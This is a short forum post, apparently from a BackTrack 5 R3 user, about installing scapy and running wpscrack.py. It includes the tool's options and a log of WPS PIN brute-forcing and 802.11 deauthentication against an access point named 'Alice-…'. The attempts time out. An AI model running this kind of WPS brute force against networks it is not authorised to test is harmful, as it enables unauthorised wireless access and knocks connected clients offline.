hi
Step 2 you link that helped ME to solve in my bt5-r3 ((many thanks to authors))
for good scapy install..... scapy 2.2.0:
http://trac.secdev.org/scapy/ticket/771 (This is perhaps not needed .. I do not know) for cert.py
for wpscrack.py...:
http://www.hack4fun.eu/2012/01/reaver-wps-wpscrack/ #traslate of czech republic
this is my bt5-r3:
root@bt:~/wpscrack# ./wpscrack.py --help
Usage: wpscrack.py --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]
Options:
-h, --help show this help message and exit
-i IFACE, --iface=IFACE
network interface (monitor mode)
-c CLIENT_MAC, --client=CLIENT_MAC
MAC of client interface
-b BSSID, --bssid=BSSID
MAC of AP (BSSID)
-s SSID, --ssid=SSID SSID of AP (ESSID)
--dh=DH_SECRET diffie-hellman secret number
-t TIMEOUT, --timeout=TIMEOUT
timemout in seconds
-p START_PIN, --pin=START_PIN
start pin for brute force
-v, --verbose verbose
root@bt:~/wpscrack# ./wpscrack.py --iface=mon0 --client B8:xF:6x:AC:xx:02 --bssid 00:1x:6x:A6:Ax:04 --ssid Alice-78x9xxx4 --dh 0 -v
sniffer started
------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.131 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.060 seconds
------------------- attempt #3
Trying 00000001
-> 802.11 deauthentication
-> 802.11 authentication request
.............................
..............................................
.................................................. ............
bye![]()


)

